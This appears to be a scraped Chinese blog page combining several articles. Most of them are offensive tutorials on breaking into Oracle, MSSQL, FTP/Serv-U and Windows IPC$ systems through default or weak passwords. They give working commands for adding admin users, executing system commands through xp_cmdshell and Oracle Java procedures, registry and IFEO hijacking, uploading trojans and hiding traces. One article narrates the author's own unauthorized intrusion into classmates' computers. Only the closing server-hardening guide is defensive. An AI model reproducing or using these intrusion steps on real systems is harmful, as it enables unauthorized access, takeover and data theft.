精华内容
下载资源
问答
  • oracle弱口令攻击

    千次阅读 2019-04-18 11:48:00
    oracle弱口令攻击 oracle弱口令攻击 0x00 oracle数据库简介 oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点: 一、支持大数据库、多用户...

    oracle弱口令攻击

    oracle弱口令攻击

     

     

    0x00 oracle数据库简介


    oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:

    一、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到>几百千兆,可充分利用硬件设备。支持大量用户同时在

    同一数据上执行各种数据应用,并使数据争用最小,保证数据一致性。系统维护具有高>的性能,Oracle每天可连续24小时工作,正常的系统操作

    (后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性,可在数据库级或在子数据库级上控制。

    二、Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以>它是一个开放系统,保护了用户的投资。美国标准化和技术

    研究所(NIST)对Oracle7 SERVER进行检验,100%地与ANSI/ISO SQL89标准的二级相>兼容。

    三、实施安全性控制和完整性控制。Oracle为限制各监控数据存取提供系统可靠的安全>性。Oracle实施数据完整性,为可接受的数据指定标准。

    四、支持分布式数据库和分布处理。Oracle为了充分利用计算机系统和网络,允许将处理分为数据库服务器和客户应用程序,所有共享的数据管理 由数据库管理系统的计算机处理,而运行数据库应用的工作站集中于解释和显示数据。通过网络连接的计算机环境,Oracle将存放在多台计算机上的 数据组合成一个逻辑数据库,可被全部网络用户存取。分布式系统像集中式数据库一样具有透明性和数据一致性。 具有可移植性、可兼容性和可连接性。由于Oracle软件可在许多不同的操作系统上运 行,以致Oracle上所开发的应用 可移植到任何操作系统,只需很少修改或不需修改。Oracle软件同工业标准相兼容,包括很多工业标准的操作系统, 所开发应用系统可在任何操作系统上运行。可连接性是指ORALCE允许不同类型的计算机和操作系统通过网络可共享信息。

     


    虽然Oracle数据库具有很高的安全性,但是如果我们在配置的时候不注意安全意识,那么也是很危险的。也就是说,安全最主要的还是要靠人自己,而不能过分依赖软件来实现。


     

     

    我们知道,在 mssql中,安装完成后默认有个sa的登陆密码为空,如果不更改就会产生安全漏洞。那么 oracle呢?也有的。

    为了安装和调试的方便,Oracle数据库中的两个具有 DBA权限的用户 SysSystem的缺省密码是 manager

    笔者发现很多国内网站的Oracle数据库没有更改这两个用户的密码,其中也包括很多大型的电子商务网站, 我们就可以利用


    进行测试前我们先来了解一些相关的知识,我们连接一个 Oracle数据库的时候,需要知道它的 service_name或者是 Sid值,就象 mssql一样,需要知道数据库名。那如何去知道呢,猜?呵呵,显然是不行的。这里我们先讲讲 oracleTNS listener,它位于数据库 Client和数据库 Server之间,默认监听1521端口,这个监听端口是可以更改的。但是如果你用一个tcp的session去连接1521端口的话,oracle将不会返回它的banner,如果你输入一些东西的话,它甚至有可能把你踢出去。这里我们就需要用 tnscmd.pl这个 perl程序了,它可以查询远程oracle数据库是否开启(也就是ping了),查询版本,以及查询它的服务

    名,服务状态和数据库服务名,而且正确率很高。


     

     

     

    0x01 oracle弱口令攻击


    理论方面的讲完了,如果还有什么不懂的可以去查找相关资料。现在开始测试吧,需要的工具有: ActivePerlOracle客户端Superscan或者是 其它扫描端口的软件Tnscmd.pl

    我们先用 Superscan扫描开放了端口1521的主机,假设其IP是 xx.xx.110.110,这样目标已经有了。然后我们要做的就是用Tnscmd.pl 来查询远程数据库的服务名了,Tnscmd.pl的用法如下:

     

    C:perlbin>perl tnscmd.pl
    usage: tnscmd.pl [command] -h hostname
    where 'command' is something like ping, version, status, etc.
    (default is ping)
    [-p port] - alternate TCP port to use (default is 1521)
    [--logfile logfile] - write raw packets to specified logfile
    [--indent] - indent & outdent on parens
    [--rawcmd command] - build your own CONNECT_DATA string
    [--cmdsize bytes] - fake TNS command size (reveals packet leakage)

     

     

     

    我们下面用的只有简单的几个命令,其他的命令也很好用,一起去发掘吧。

    然后我们就这样来:

     

    C:perlbin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent
    sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521
    writing 91 bytes
    reading
    ._.......6.........?. ..........
    DESCRIPTION=
    TMP=
    VSNNUM=135286784
    ERR=0
    SERVICES_EXIST=1
    .Q........
    SERVICE=
    SERVICE_NAME=ORCL
    INSTANCE=
    INSTANCE_NAME=ORCL
    NUM=1
    INSTANCE_CLASS=ORACLE
    HANDLER=
    HANDLER_DISPLAY=DEDICATED SERVER
    STA=ready
    HANDLER_INFO=LOCAL SERVER
    HANDLER_MAXLOAD=0
    HANDLER_LOAD=0
    ESTABLISHED=447278
    REFUSED=0
    HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227
    HANDLER_NAME=DEDICATED
    ADDRESS=
    PROTOCOL=beq
    PROGRAM=/home/oracle/bin/oracle
    ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'
    ARGV0=oracleORCL
    ARGS='
    LOCAL=NO
    '
    .........@  

     

    从上面得到的信息我们可以看出数据库的服务名为ORCL,然后我们就可以通过 sqlplus工具来远程连上它了,

    用户名和密码我们用默认的 system/manager或者是 sys/manager,其他的如 mdsys/mdsysctxsys/ctxsys等,

    这个默认用户和密码是随版本的不同而改变的。如下:

     

    1. C:oracleora90BIN>sqlplus /nolog
    2. SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 23 11:36:59 2002
    3. (c) Copyright 2001 oracle Corporation. All rights reserved.
    4. SQL>connect system/manager@
    5. (description=(address_list=(address=(protocol=tcp)
    6. (host=xx.xx.110.110)(port=1521)))
    7. (connect_data=(SERVICE_NAME=ORCL)));

    如果密码正确,那么就会提示 connected,如果不行,再换别的默认用户名和密码。经过笔者的尝试一般用 dbsnmp/dbsnmp都能进去。当然如果对方已经把默认密码改了,那我们只能换别的目标了。但是我发现很多都是不改的,这个就是安全意识的问题了。


     

     

    0x02 上面提到的两个小软件:

    tnscmd.pl

    1. 代码: tnscmd.pl

    用链表实现的oracle密码暴破程序

    1. 代码: 用链表实现的oracle密码暴破程序

     

     

    0x03 利用弱口令进行入侵:

    #

    C:\>sqlplus /nolog
    SQL> connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=www.xx.com)
    (port=1521)))(connect_data=(SERVICE_NAME=ora9i)));

     

    然后利用 OracleExecuteCommandSqlScript来执行系统命令

    posted @ 2019-04-18 11:48 卿先生 阅读(...) 评论(...) 编辑 收藏

    展开全文
  • web入侵二之弱口令攻击及其他

    万次阅读 2015-12-30 17:14:28
    一、什么是弱口令  就是说由常用数字、字母、字符等组合成的,容易被别人通过简单及平常的思维方式就能猜到的密码,利用弱口令结合计算机系统等漏洞可以做到入侵的事半功倍的效果   二、共享入侵--IPC$  IPC$...

    一、什么是弱口令

      就是说由常用数字、字母、字符等组合成的,容易被别人通过简单及平常的思维方式就能猜到的密码,利用弱口令结合计算机系统等漏洞可以做到入侵的事半功倍的效果

     

    二、共享入侵--IPC$

        IPC$是共享“命名管道”资源,它是为了让进程间通信而开放的命令管道,可以通过验证用户名和密码获取相应的权限,在远程管理计算机和查看计算机的共享资源是使用,利用IPC$,攻击者甚至可以与目标主机建立一个空的连接而无需用户名和密码,前提是对方开启了IPC$共享。

    1、如何利用iPC$入侵

     第一步,利用空连接得到目标主机上的用户列表,使用命令,例如:net use \\192.168.1.200\ipc$"/user:"" 建立连接,

        第二步,采用爆破方法扫描得到用户名和密码 ,其实就是net use z:\\192.168.1.200\c$,不断的暴力尝试

        第三步,得到用户名和密码后 登录对方电脑,net use \\192.168.1.200\ipc$ "test" /user:administrator,net use z:\\192.168.1.203\ipc$

        第四步,打开我的电脑发现多了一个z盘,其实就是目标机的c盘内容了

        第五步,上传木马后门,exe文件或者bat文件都可以,就是复制粘贴就行了

       第六步,执行木马后门,利用at命令设定时间运行该程序,先net time \\192.168.1.203命令查看系统时间,而后领用at命令at \\192.168.1.203 21:05 c:\test.bat,就可以让目标机在预定时间只用木马,而后沦为肉鸡。

    2、IPC$入侵注意事项

        第一,不要把\写成了/

        第二,在建立空连接的时候,引号的输入应在英文状态下输入

    3、如何防范IPC$入侵

         第一,cmd下输入命令:net share 看看自己的机器开了多少共享

        第二,再用net share 共享名/del删除共享

        第三,最彻底的办法就是禁用IPC$服务,命令为:net stop server,而后输入y即可

       以上就是IPC$入侵的大致过程,不妨自己虚拟机环境下自己动手运行一下,或者黑一下室友的机子。。。。。。。。。。。

     

    三、目录浏览

        目录浏览是基于web服务的,也就是说如果web服务配置不当,就可以导致攻击者浏览web目录下的任意文件和目录。如IIS、apache、tomcat等web服务器都有可能存在这样的问题。

     

    四、暴库

        暴库,就是通过一些技术手段或者程序漏洞得到数据库的地址,并将数据非法下载到本地。这里要了解两个概念:相对路径(如D:/text/text.txt)和绝对路径(如:/text/text.txt)。

    暴库有两个方法来实现,第一个就是利用%5c,另外一个就是conn.asp暴库。

        1、%5c暴库

        简单的说就是在打开网页时,将/换成%5c,然后提交就可以得到数据库地址了,但必须是需要调用数据库的页面,比如登录等,

        原因:

         这和IIS的解析有关,%5c是\的十六进制代码,也就是\的另一种表达方式,我们在提交网页时,IE会自动把%5c转换成/,从而得到同一地址,可是ISS并不这样认为,应为来了一个%5c(也就是/),虽然IE解析的时候是一个意思,可在ISS这里却认为访问到\这里就到了根目录所在的地方,而不再往上解析了。

    2、con.asp 暴库

        同%5c的方法一样,%5c是利用绝对路径出错,而con.asp是利用相对路径出错。

        例如,conn.sap代码:

        <%

    db="kerally database/kenerldatabase.mdb"

    constr="DB!"+server.mappath(do)+"DefaultDir=DRIVER{Microsoft Acess Driver(*mb)|.Pwd=kenanel"

    set com=server.createObject("ADODB ,Connection"

    con.open.coratr

    Sub.rsclose()

         rs.Close()

    set rs=nothing

    End sub

    sub.conclose()

    conn.close()

    set conn=nothing

    End sub

    %>

    第一句中,调用数据库相对路径是”kenatlybdatabase/kenandatabase.mdb"..conn.asp文件一般是起调用数据库作用的,如果调用文件和conn.asp文件的相对位置发生变化了,那么就会出现暴库。

    3、暴库的防范

    (1)及时更新发现过的漏洞,也就是把IIS升级到最新版本

    (2)在conn.asp暴库中,限制文件暴库,也就是让他不暴库继续执行,加入一些代码即可

    五、弱口令攻击

         弱口令,设计到电脑的各种口令设置简单的后果,比如FTP、SSH灯各种服务,抑或管理平台的口令,都可能被攻击者不费任何力气获得,从而导致服务器的沦陷。

    下面就把一些常用的基于大众的弱口令方法描写出来。

    1、FTP弱口令

         FTP(FILE TRANSFER Protocol)是文件传输协议的简称,用于Internet上传文件的双向传输。同时,它也是一个应用程序,用户可以通过它把自己的PC机与各地的所有运行FTP协议的服务器相连,访问服务器上的大量信息。

         例如,我们可以利用FTP读取、上传、删除、创建文件或者程序,如果得到了一个权限很大的FTP账号,后果是比较严重的,现在比较流行的还有SerV-u工具。

        第一步,连接ftp服务器,方式:ftp 服务器IP地址

        第二部,使用hscan工具扫描开始IP和结束IP,也可以挑选要扫描的IP,这里我们输入目的ftp服务器IP

        第三部,扫描结束后,如果对方是弱口令,我们将得到连接ftp服务器的用户名和密码

        第四步,如果对方使用的是Serv-u,可以直接加一个系统账户,命令为:quote site exec net user guest /avtive:yes(这一句的作用是把系统内置账户guest激活),如果serv-u没有权限执行命令的话,我们就要换一种思路了

        第五步,既然无法直接添加系统用户,可以先使用dir命令看一下有什么文件,如果查看到admin、upload这样目录,还有index.htm,这里就要注意啦,很可能一个web目录,此时我们可以穿一个后门asp脚本就可能得到一个shell.

       第六步,找到思路后,我们要先知道后门被传到哪里了,也就是说我们要能通过url连接到我们的后门地址,先把它的index下载到本地看一下里面是什么内容,命令为:

    get index.htm c:\index.htm,就是把index.htm文件下载到本机c盘里面。

         第七步,根据内容找到服务器的URL,这个主要通过社工,如百度等

         第八步,直接通过ftp上传一个asp脚本木马上去,命令为:put F:\web木马\asp马\dama.asp。

         第九步,接着打开http://www.xx.com/dama.asp,输入后门密码,这个shell自带serv-u提权功能,点击serv-u提权,然后添加用户即可。

         第十步,占领3389端口,mstsc 输入用户名和密码,这样就成功占领服务器的桌面了。

         注意:

         第一,得到ftp密码后如果不能直接利用,不要死盯一点,一般ftp服务的都会有web服务,应该把目光放大一点,充分利用资源

         第二,就是要利用尽可能多的方法来收集对方的信息

         第三,隐藏自己的入侵痕迹,你懂得。

    2、基于MSSQL弱口令的入侵

         MSSQL其实是一个关系数据库管理系统,是Microsoft推出的新一代数据管理与分析软件,它是一个全面的、集成的、端到端的数据解决方案,为企业中的用户提供了一个安全,可靠和高效的平台,用于企业数据管理和商业智能应用,所以适合一些大型网站的使用

         如何利用已知用户名和密码的情况下拿到服务器权限

    相关知识:

         1、 在SQL server中,主要有两种角色类型:服务器角色与数据库角色,攻击者在攻击时,会遇到三种角色:sa权限、db_owner权限和public权限

          (1)sa权限

             是system和Admin的缩写,为MSSQL数据库的默认系统账号,具有最高权限,第一次安装MSSQL时,如果sa密码过于简单,攻击者很可能用hscan或者x-scan等暴力破解工具通过字典爆破的方式得到用户名和密码,然后再通过sql连接器灯工具连到1433端口(MSSQL默认端口),利用扩展存储执行系统命令。

         (2)Db_owner权限:

          其中db是database的缩写,owner是拥有者的意思。从字面上我们就可以猜出db_owner是指某个数据库的拥有者,它拥有对数据库的修改、删除等大部分存储过程的权限,但是涉及到系统敏感操作时,它是没有权限的,如前面提到的xp_cmdshell等

         (3)public权限

         public的权限相对较小,不过还是有可以利用到的地方比如目录、建立临时表等。

         第一步,假如我们已经扫描到一台拥有弱口令的机器,用户名是sa,口令为admin,我们首先通过sqltools.exe连接上去试一下,不然就试一下MSSQL连接器.exe,或者sql查询分析器分离版本连接。

        第二步,执行exec xp_cmdshell ‘net user test test /add'、exec xp_cmdshell、net localgroup adminis-trators text /add'命令成功添加具有管理员权限的用户

        第三步,假如管理员做了手脚,把xp_cmdshell这个存储过程删了,或者关闭了

        开启xp_cmdshell:

        EXEC sp__configure 'show advanced options',1,RECONFIGURE;:EXEC sp_configre 'xp_configure' 1 RECONFIGLRE;

        恢复xp_cmdshell:

        EXEC sp_addexiendeproc xp_cmdshell @dllname='xplog70.dll

       第四步,操作注册表提权主要有两种思路,一种就是利用注册表启动项,执行以下代码

    exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','Software\microsoft\windows\currentversion\policies\explorer\run','running','REG_SZ','c:\windows\system32\cmd.exe /c net user 1st 1st /add'

         这样只要等待服务器重启就会运行代码,从而添加一个用户名和密码都为1st的用户。既然能操作注册表了,我们就可以用镜像劫持之类的技术来达到不需要重启就可以直接占领3389的目的。

        第五步,了解镜像劫持,利用其渗透

        镜像劫持(IFEO)就是image file exeution options,它位于注册表HKEY_LOCAL_MACHINE\SOFTWRE\Microsoft\Windows NT\CurrentVersion\CurrentVersion\Image File Executions,最关键的是,这个键值下有一个Debugger参数,“调试器",它是IFEO里被第一个被处理的参数,其作用如下:

        系统如果发现某个程序文件在IFEO列表中,它就会首先来读取 Debugger参数,如果该参数不为空,系统就会把Debugger参数里指定的程序文件名作为用户尝试启动的程序执行请求来处理。其本身目的是双击程序文件就进入调试,但是黑客如果换成cmd.exe或者exploer.exe就可以直接执行系统命令了,代码如下

       exec master.dbo.xp-regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Micosoft\\Windows NT\\CurentVersion\\Image File Exection\\setc.exe','debugger','REG_SZ','C:\\windows\\exploer.exe'

        第六步,进入桌面程序 添加登录账号。

    3.基于MySql弱口令的入侵 4 基于oracle弱口令的入侵 5。tomcat弱口令的入侵  6、第三方管理工具radmin和vnc弱口令入侵

      

     

     

     

     

     

     

     

    展开全文
  • Oracle 10g弱口令攻击

    千次阅读 2011-10-20 14:24:16
    既然是弱口令,我就直接用PL/SQL Developer(Oracle数据开发软件,网上多的是)连接上他电脑的Oracle服务。 连接上他电脑的Oracle了,就新建SQL窗口……然后: 第一步: 创建Java Sources文件用于执行cmd,学过...
      
    

    2011-01-08 13:52:44|  分类: Hack everything! |  标签:java  rc  oracle  bufsize  int   |字号 订阅

     

    最近网速又是ungeliveble了……

    "全民上网,决不BT下载!”这是局域网用网宗旨啊!无奈,好多童鞋就下载,而且全是一些烂电视剧,一不小心就是好几G,几十G,10M的网速怎么经得起这样的折腾!

    幸好他们的安全意识不怎么样,前天用默认的隐藏共享在另一个网段一些童鞋的C盘里丢了一下面的批处理mstsc.bat:

     reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

    net user test test /add

    net localgroup administrators test /add

     以上三条就是:

    1.       打开远程桌面

    2.       添加一个用户名/密码:test/test的用户

    3.       将test用添加到管理员组

    我这里LAN的机器全是Windows 2003的而且登录窗口是: 

    Oracle 10g弱口令攻击 - Neo - Neo-Sniper

    他们的安全意识似乎不高,所以我就没有必要添加什么隐藏用户之类的,然后再用下面的命令完成迅速占领

    C: >net use \\192.168.3.46\ipc$ " " /user:administrator

    命令成功完成。

    C: >net time \\192.168.3.46

    \\192.168.3.46 的当前时间是 2011-1-6 19:15

    命令成功完成。

    C: >at \\192.168.3.46 19:16 C:\windows\system32\mstsc.bat

    新加了一项作业,其作业 ID = 2

    是不是纠结怎么会有这么菜的机器等着我?不好好学习看电视剧的人就这样……

    至于如果修补我就不说了。

    等过了19:16就win+R:mstsc,用test/test成功进入它机器了(当然你用administrator/” ”登录也行 ,我创建个用户是为了防止他哪天心血来潮修改密码我又得花力气进去了……)

    在他电脑里装了流量监测软件,首先来个流量限制,然后谁下载就给他这个果子吃。

    shutdown –s –c ”大哥,别下载了……回家老婆孩子热炕头,OK?” –t 10

    如果他不会shutdown –a就等着关机吧!

    然后批量的执行了上面的操作,果然好多了……

    192.168.3.X网段的家伙气焰被打击了不少,自己的网段又来了……

    也许是被渲染了,这个家伙居然密码改了,隐藏共享全关了,流量出其的高,难道没撤了?!

    学Java要用Oracle是不?想不到Oracle也会让你栽吧?

    因为这里的机器都是刷机的,所有Oracle的密码都是一样的而且是DBA权限!

    先用mickey兄的调用msvcrt.dll文件来试,郁闷了,报错:

    Oracle 10g弱口令攻击 - Neo - Neo-Sniper

    也就是调用库文件出错了,网上解释全是listener.ora,tnsnames.ora配置文件有问题,咋办?我要是能进他电脑修改Oracle配置文件,还费这么大周张干什么?

    上下网而求索,终得方法:

    既然是弱口令,我就直接用PL/SQL Developer(Oracle数据开发软件,网上多的是)连接上他电脑的Oracle服务。

    连接上他电脑的Oracle了,就新建SQL窗口……然后:

    第一步:创建Java Sources文件用于执行cmd,学过Java就会明白,这段代码主要是干什么的,而且也很简单。

     CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED "util"
    AS
    import java.io.*;
    import java.lang.*;
    public class util extends Object
    {
      public static int RunThis(String args)
      {
        Runtime rt = Runtime.getRuntime();
        int RC = -1;
        try
        {
          Process p = rt.exec(args);
          int bufSize = 4096;
          BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
          int len;
          byte buffer[] = new byte[bufSize];
          // Echo back what the program spit out
          while ((len = bis.read(buffer, 0, bufSize)) != -1)
          System.out.write(buffer, 0, len);
          RC = p.waitFor();
        }
        catch (Exception e)
        {
          e.printStackTrace();
          RC = -1;
        }
        finally
        {
          return RC;
        }
      }
    }

       

    第二步:创建函数调用该代码

     CREATE OR REPLACE FUNCTION RUN_CMD(F_CMD IN VARCHAR2)
    RETURN NUMBER
    AS
    LANGUAGE JAVA
    NAME 'util.RunThis(java.lang.String) return integer';

    第三步:创建过程调用该函数

     CREATE OR REPLACE PROCEDURE RC(P_CMD IN VARCHAR2)
    AS
    X NUMBER;
    BEGIN
         X:=RUN_CMD(P_CMD);
    END;

    然后切换到你自己电脑的命令提示符下:

    1.       连接:

     Sqlplus system/密码@IP:端口号/数据服务名称
       2.       执行如下代码:

     VARIABLE X NUMBER;
    SET SERVEROUTPUT ON;
    EXEC DBMS_JAVA.SET_OUTPUT(100000);
    GRANT JAVASYSPRIV TO SYSTEM;
       3.       强行入侵代码:

     exec :x:=run_cmd('cmd /c cmd命令');  
     都这样了你还不是想干什么就干什么?开个后门什么的……

    截图示之:

    Oracle 10g弱口令攻击 - Neo - Neo-Sniper

    进他电脑……给予警告!然后继续学习……

    当然,完成攻击之后,在Oracle中把留下的JavaSources文件、函数、存储过程全删了,不给他留下!

    展开全文
  • 1、局域网共享弱口令扫描 2、pop弱口令爆破(邮件服务110端口) 3、FTP弱口令爆破(FTP服务21端口) FTP客户端连接管理 4、1433弱口令爆破(MSSQL数据库弱口令) 1433数据库连接管理 5、3306弱口令爆破(MYSQL数据库弱...
  • 作者:利客来源:校园黑客联盟挑战黑客注入上传弱口令跨站攻击远程控制打造攻不破的虚拟机注入漏洞、上传漏洞、弱口令漏洞等问题随处可见。跨站攻击,远程控制等等是再老套不过了的话题。有些虚拟主机管理员不知是为了...

    作者:利客

    来源:校园黑客联盟

    挑战黑客注入上传弱口令跨站攻击远程控制打造攻不破的虚拟机


    注入漏洞、上传漏洞、弱口令漏洞等问题随处可见。跨站攻击,远程控制等等是再老套不过了的话题。有些虚拟主机管理员不知是为了方便还是不熟悉配置,干脆就将所有的网站都放在同一个目录中,然后将上级目录设置为站点根目录。有些呢,则将所有的站点的目录都设置为可执行、可写入、可修改。有些则为了方便,在服务器上挂起了QQ,也装上了bt。更有甚者,竟然把Internet来宾帐号加入到Administrators组中!汗……!普通的用户将自己的密码设置为生日之类的6位纯数字,这种情况还可以原谅,毕竟他们大部分都不是专门搞网络研究的,中国国民的安全意识提高还需要一段时间嘛,但如果是网络管理员也这样,那就怎么也有点让人想不通了。网络安全问题日益突出,最近不又有人声称“万网:我进来玩过两次了!”。这么有名气的网络服务商,也难免一逃啊!网站注入漏洞是最近还频频在报刊杂志上曝光的高校入侵…… 一句话,目前很大部分的网站安全状况让人担忧!

    这里就我个人过去的经历和大家一同来探讨有关安全虚拟主机配置的问题。以下以我的站为例
    www.hookbase.com,跟大家共同探讨虚拟主机配置问题。

    一、建立windows用户

    为每个网站单独设置windows用户帐号cert,删除帐号的User组,将cert加入Guest用户组。将用户不能更改密码,密码永不过期两个选项选上。

    二、设置文件夹权限

    1、 设置非站点相关目录权限

    Windows安装好后,很多目录和文件默认是everyone可以浏览、查看、运行甚至是可以修改 的。这给服务器安全带来极大的隐患。这里就我个人的一些经验提一些在入侵中较常用的目录。

    C:/;D:/;……

    操作:C:/perl

    操作:C:/temp/

    操作:C:/Mysql/

    操作:C:/php/

    操作:C:/autorun.inf

    操作:C:/Documents and setting/

    操作:C:/Documents and Settings/All Users/「开始」菜单/程序/

    操作:C:/Documents and Settings/All Users/「开始」菜单/程序/启动

    操作:C:/Documents and Settings/All Users/Documents/

    操作:C:/Documents and Settings/All Users/Application Data/Symantec/

    操作:C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere

    操作:C:/WINNT/system32/config/

    操作:C:/winnt/system32/inetsrv/data/

    操作:C:/WINDOWS/system32/inetsrv/data/

    操作:C:/Program Files/

    操作:C:/Program Files/Serv-U/

    操作:C:/Program Files/KV2004/

    操作:C:/Program Files/Rising/RAV

    操作:C:/Program Files/RealServer/

    操作:C:/Program Files/Microsoft SQL server/

    操作:C:/Program Files/Java Web Start/

    以上这些目录或文件的权限应该作适当的限制。如取消Guests用户的查看、修改和执行等权限。由于篇幅关系,这里仅简单提及。

    2、 设置站点相关目录权限:

    A、 设置站点根目录权限:将刚刚建立的用户cert给对应站点文件夹,假设为D:/cert设置相应的权限:Adiministrators组为完全控制; cert有读取及运行、列出文件夹目录、读取,取消其它所有权限。 2 。

    B、 设置可更新文件权限:经过第1步站点根目录文件夹权限的设置后,Guest用户已经没有修改站点文件夹中任何内容的权限了。这显然对于一个有更新的站点是不够的。这时就需要对单独的需更新的文件进行权限设置。当然这个可能对虚拟主机提供商来说有些不方便。客户的站点的需更新的文件内容之类的可能都不一样。这时,可以规定某个文件夹可写、可改。如有些虚拟主机提供商就规定,站点根目录中uploads为web可上传文件夹,data或者database为数据库文件夹。这样虚拟主机服务商就可以为客户定制这两个文件夹的权限。 3 。当然也可以像有些做的比较好的虚拟主机提供商一样,给客户做一个程序,让客户自己设定。可能要做到这样,服务商又得花不小的钱财和人力哦。

    三、配置IIS

    基本的配置应该大家都会,这里就提几个特殊之处或需要注意的地方。

    1、 主目录权限设置:这里可以设置读取就行了。写入、目录浏览等都可以不要,最关键的就是目录浏览了。除非特殊情况,否则应该关闭,不然将会暴露很多重要的信息。这将为黑客入侵带来方便。其余保留默认就可以了。 4 。

    2、 应用程序配置:在站点属性中,主目录这一项中还有一个配置选项,点击进入以后, 5 。在应用程序映射选项中可以看到,默认有许多应用程序映射。将需要的保留,不需要的全部都删除。在入侵过程中,很多程序可能限制了asp,php等文件上传,但并不对cer,asa等文件进行限制,如果未将对应的应用程序映射删除,则可以将asp的后缀名改为cer或者asa后进行上传,木马将可以正常被解析。这也往往被管理员忽视。另外添加一个应用程序扩展名映射,可执行文件可以任意选择,后缀名为.mdb。 6 。这是为了防止后缀名为mdb的用户数据库被下载。

    3、 目录安全性设置:在站点属性中选择目录安全性,点击匿名访问和验证控制,选择允许匿名访问,点击编辑。如下图 。删除默认用户,浏览选择对应于前面为cert网站设定的用户,并输入密码。可以选中允许IIS控制密码。这样设定的目的是为了防止一些像站长助手、海洋等木马的跨目录跨站点浏览,可以有效阻止这类的跨目录跨站入侵。 7 。

    4、 可写目录执行权限设置:关闭所有可写目录的执行权限。由于程序方面的漏洞,目前非常流行上传一些网页木马,绝大部分都是用web进行上传的。由于不可写的目录木马不能进行上传,如果关闭了可写目录的执行权限,那么上传的木马将不能正常运行。可以有效防止这类形式web入侵。 8 。

    5、 处理运行错误:这里有两种方法,一是关闭错误回显。IIS属性――主目录――配置――应用程序调试――脚本错误消息,选择发送文本错误信息给客户。 9 。二是定制错误页面。在IIS属性――自定义错误信息,在http错误信息中双击需要定制的错误页面,将弹出错误映射属性设置框。消息类型有默认值、URL和文件三种,可以根据情况自行定制。 10 。这样一方面可以隐藏一些错误信息,另外一方面也可以使错误显示更加友好。

    四、配置FTP

    ftp是绝大部分虚拟主机提供商必备的一项服务。用户的站内文件大部分都是使用ftp进行上传的。目前使用的最多的ftp服务器非Serv-U莫属了。这里有几点需要说明一下。

    1、 管理员密码必须更改

    如果入侵爱好者们肯定对Serv-U提权再熟悉莫过了。这些提权工具使用的就是Serv-U默认的管理员的帐号和密码运行的。因为Serv-U管理员是以超级管理员的身份运行的。如果没有更改管理员密码,这些工具使用起来就再好用不过了。如果更改了密码,那这些工具要想正常运行,那就没那么简单喽。得先破解管理员密码才行。

    2、 更改安装目录权限

    Serv-U的默认安装目录都是everyone可以浏览甚至可以修改的。安装的时候如果选择将用户信息存储在ini文件中,则可以在ServUDaemon.ini得到用户的所有信息。如果Guests有修改权限,那么黑客就可以顺利建立具有超级权限的用户。这可不是一件好事。所以在安装好Serv-U之后,得修改相应的文件夹权限,可以取消Guests用户的相应权限。

    五、命令行相关操作处理

    1、 禁止guests用户执行com.exe:

    我们可以通过以下命令取消guests执行com.exe的权限cacls 操作:C:/WINNT/system32/Cmd.exe /e /d guests。

    2、 禁用WScript.Shell组件:

    WScript.Shell可以调用系统内核运行DOS基本命令。可以通过修改注册表,将此组件改名,来防止此类木马的危害。HKEY_CLASSES_ROOT/WScript.Shell/ 及HKEY_CLASSES_ROOT/WScript.Shell.1/改名为其它的名字。将两项clsid的值也改一下 HKEY_CLASSES_ROOT/WScript.Shell/CLSID/项目的值和
    HKEY_CLASSES_ROOT/WScript.Shell.1/CLSID/项目的值,也可以将其删除。

    3、 禁用Shell.Application组件

    Shell.Application也可以调用系统内核运行DOS基本命令。可以通过修改注册表,将此组件改名,来防止此类木马的危害。HKEY_CLASSES_ROOT/Shell.Application/ 及
    HKEY_CLASSES_ROOT/Shell.Application.1/ 改名为其它的名字。将
    HKEY_CLASSES_ROOT/Shell.Application/CLSID/项目的值
    HKEY_CLASSES_ROOT/Shell.Application/CLSID/项目的值更改或删除。同时,禁止Guest用户使用shell32.dll来防止调用此组件。使用命令:
    cacls 操作:C:/WINNT/system32/shell32.dll /e /d guests

    4、 FileSystemObject组件

    FileSystemObject可以对文件进行常规操作可以通过修改注册表,将此组件改名,来防止此类木马的危害。对应注册表项为HKEY_CLASSES_ROOT/Scripting.FileSystemObject/。可以禁止guests用户使用或直接将其删除。考虑到很多的上传都会使用到这个组件,为了方便,这里不建议更改或删除。

    5、 禁止telnet登陆

    在操作:C:/WINNT/system32目录下有个login.cmd文件,将其用记事本打开,在文件末尾另取一行,加入exit保存。这样用户在登陆telnet时,便会立即自动退出。

    注:以上修改注册表操作均需要重新启动WEB服务后才会生效。

    六、端口设置

    端口窗体底端就是门,这个比喻非常形象。如果我们服务器的所有端口都开放的话,那就意味着黑客有好多门可以进行入侵。所以我个人觉得,关闭未使用的端口是一件重要的事情。在控制面板――网络与拨号连接――本地连接――属性――Internet协议(TCP/IP)属性,点击高级,进入高级TCP/IP设置,选择选项,在可选的设置中选择TCP/IP筛选,启用TCP/IP筛选。添加需要的端口,如21、80等,关闭其余的所有未使用的端口。

    七、关闭文件共享

    系统默认是启用了文件共享功能的。我们应给予取消。在控制面板――网络和拨号连接――本地连接――属性,在常规选项种,取消Microsoft 网络文件和打印共享。 12 。服务最少原则是保障安全的一项重要原则。非必要的服务应该给予关闭。系统服务可以在控制面板――管理工具――服务中进行设定。 12 。

    八、关闭非必要服务

    类似telnet服务、远程注册表操作等服务应给予禁用。同时尽可能安装最少的软件。这可以避免一些由软件漏洞带来的安全问题。有些网管在服务器上安装QQ,利用服务器挂QQ,这种做法是极度错误的。

    九、关注安全动态及时更新漏洞补丁
    1:23 2005-10-2
